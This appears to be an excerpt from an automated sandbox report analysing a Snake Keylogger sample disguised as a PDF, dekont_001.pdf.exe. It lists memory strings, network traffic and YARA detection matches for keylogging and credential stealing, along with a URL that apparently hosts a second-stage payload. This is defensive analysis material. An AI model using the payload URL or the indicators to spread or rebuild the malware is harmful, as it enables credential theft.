Source: InstallUtil.exe, 00000001.00000002.2934160902.0000000002E95000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E0E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.0000000003217000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.0000000003226000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.0000000003269000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.0000000003310000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.000000000331F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032E3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: InstallUtil.exe, 00000001.00000002.2934160902.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.0000000003161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: dekont_001.pdf.exe, 00000000.00000002.1768060486.0000000003E48000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1761092855.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1768060486.0000000003EC8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2930601192.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Id.exe, 00000004.00000002.1927771292.000000000339C000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 00000004.00000002.1946252341.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: InstallUtil.exe, 00000001.00000002.2934160902.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002DE3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.0000000003310000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.000000000331F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.000000000323E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032E3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: dekont_001.pdf.exe, 00000000.00000002.1761092855.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 00000004.00000002.1927771292.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.0000000003161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: dekont_001.pdf.exe, 00000000.00000002.1761092855.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 00000004.00000002.1927771292.0000000002F41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://erkasera.com
Source: dekont_001.pdf.exe, Id.exe.0.dr	String found in binary or memory: https://erkasera.com/seuias/Mfevxcugo.dat
Source: dekont_001.pdf.exe, 00000000.00000002.1772053391.0000000006B60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: dekont_001.pdf.exe, 00000000.00000002.1772053391.0000000006B60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: dekont_001.pdf.exe, 00000000.00000002.1772053391.0000000006B60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: InstallUtil.exe, 00000001.00000002.2934160902.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E0E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.0000000003226000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.0000000003269000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.0000000003310000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.000000000331F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032E3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: dekont_001.pdf.exe, 00000000.00000002.1768060486.0000000003E48000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1761092855.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1768060486.0000000003EC8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2930601192.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Id.exe, 00000004.00000002.1927771292.000000000339C000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 00000004.00000002.1946252341.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.0000000003226000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: InstallUtil.exe, 00000007.00000002.2933316783.00000000032B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.81
Source: InstallUtil.exe, 00000001.00000002.2934160902.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002E0E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.0000000003269000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.0000000003310000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.000000000331F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032E3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000032B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.81$
Source: dekont_001.pdf.exe, 00000000.00000002.1772053391.0000000006B60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: dekont_001.pdf.exe, 00000000.00000002.1761092855.0000000002EE6000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1772053391.0000000006B60000.00000004.08000000.00040000.00000000.sdmp, Id.exe, 00000004.00000002.1927771292.0000000002F8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: dekont_001.pdf.exe, 00000000.00000002.1772053391.0000000006B60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767

Source: unknown	HTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.4:49746 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.dekont_001.pdf.exe.3e49550.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.dekont_001.pdf.exe.3e49550.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.dekont_001.pdf.exe.3e49550.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.dekont_001.pdf.exe.3e49550.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.dekont_001.pdf.exe.3e49550.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.dekont_001.pdf.exe.3e49550.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.dekont_001.pdf.exe.3e49550.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.dekont_001.pdf.exe.3e49550.4.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.1768060486.0000000003E48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1768060486.0000000003E48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000004.00000002.1927771292.000000000339C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.1761092855.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000004.00000002.1946252341.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000004.00000002.1946252341.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000001.00000002.2930601192.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000001.00000002.2930601192.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.1768060486.0000000003EC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1768060486.0000000003EC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: dekont_001.pdf.exe PID: 6968, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: dekont_001.pdf.exe PID: 6968, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: InstallUtil.exe PID: 732, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: InstallUtil.exe PID: 732, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: Id.exe PID: 2188, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Id.exe PID: 2188, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: dekont_001.pdf.exe

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Code function: 0_2_05E83628	0_2_05E83628
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Code function: 0_2_05E824C8	0_2_05E824C8
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Code function: 0_2_05E81060	0_2_05E81060
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Code function: 0_2_05E36E5B	0_2_05E36E5B
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Code function: 0_2_0118D248	0_2_0118D248
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Code function: 0_2_011891B9	0_2_011891B9
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Code function: 0_2_011891C8	0_2_011891C8
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Code function: 0_2_01189850	0_2_01189850
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Code function: 0_2_01189860	0_2_01189860
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Code function: 0_2_075CE2C0	0_2_075CE2C0
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Code function: 0_2_075B0040	0_2_075B0040
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Code function: 0_2_075B0006	0_2_075B0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F8C08B	1_2_00F8C08B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F8F01F	1_2_00F8F01F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F86120	1_2_00F86120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F8B507	1_2_00F8B507
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F846DF	1_2_00F846DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F8B7E3	1_2_00F8B7E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F8C76B	1_2_00F8C76B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F86898	1_2_00F86898
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F8BAC0	1_2_00F8BAC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F8CA41	1_2_00F8CA41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F8BDA0	1_2_00F8BDA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F8357B	1_2_00F8357B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F8E538	1_2_00F8E538
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F8E52F	1_2_00F8E52F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06648460	1_2_06648460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06643870	1_2_06643870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06640040	1_2_06640040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066411C0	1_2_066411C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06647D90	1_2_06647D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664FA68	1_2_0664FA68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664C648	1_2_0664C648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664FA59	1_2_0664FA59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664C638	1_2_0664C638
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664F600	1_2_0664F600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664F610	1_2_0664F610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664CEE9	1_2_0664CEE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664CEF8	1_2_0664CEF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664CAA0	1_2_0664CAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664D340	1_2_0664D340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664D350	1_2_0664D350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066473E8	1_2_066473E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664DBF1	1_2_0664DBF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664D7A8	1_2_0664D7A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664D798	1_2_0664D798
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06643867	1_2_06643867
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664E049	1_2_0664E049
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664E058	1_2_0664E058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06640033	1_2_06640033
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664DC00	1_2_0664DC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664B4E8	1_2_0664B4E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066408F0	1_2_066408F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664E8F8	1_2_0664E8F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664B4D7	1_2_0664B4D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066404A0	1_2_066404A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664E4A0	1_2_0664E4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664E4B0	1_2_0664E4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06640493	1_2_06640493
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06640D60	1_2_06640D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664ED60	1_2_0664ED60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664B940	1_2_0664B940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664ED50	1_2_0664ED50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06640D5B	1_2_06640D5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664B930	1_2_0664B930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06640900	1_2_06640900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664E908	1_2_0664E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664C1E0	1_2_0664C1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664C1F0	1_2_0664C1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664F1A9	1_2_0664F1A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664F1B8	1_2_0664F1B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066411BB	1_2_066411BB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664BD88	1_2_0664BD88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0664BD98	1_2_0664BD98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0667D670	1_2_0667D670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0667AA58	1_2_0667AA58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06678608	1_2_06678608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0667B6E8	1_2_0667B6E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0667C388	1_2_0667C388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06670040	1_2_06670040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06678C51	1_2_06678C51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0667D028	1_2_0667D028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0667A408	1_2_0667A408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0667B0A0	1_2_0667B0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0667BD38	1_2_0667BD38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0667C9D8	1_2_0667C9D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066711A0	1_2_066711A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0667D662	1_2_0667D662
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06675A60	1_2_06675A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06675A70	1_2_06675A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0667AA48	1_2_0667AA48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06678602	1_2_06678602
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06675609	1_2_06675609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06675618	1_2_06675618
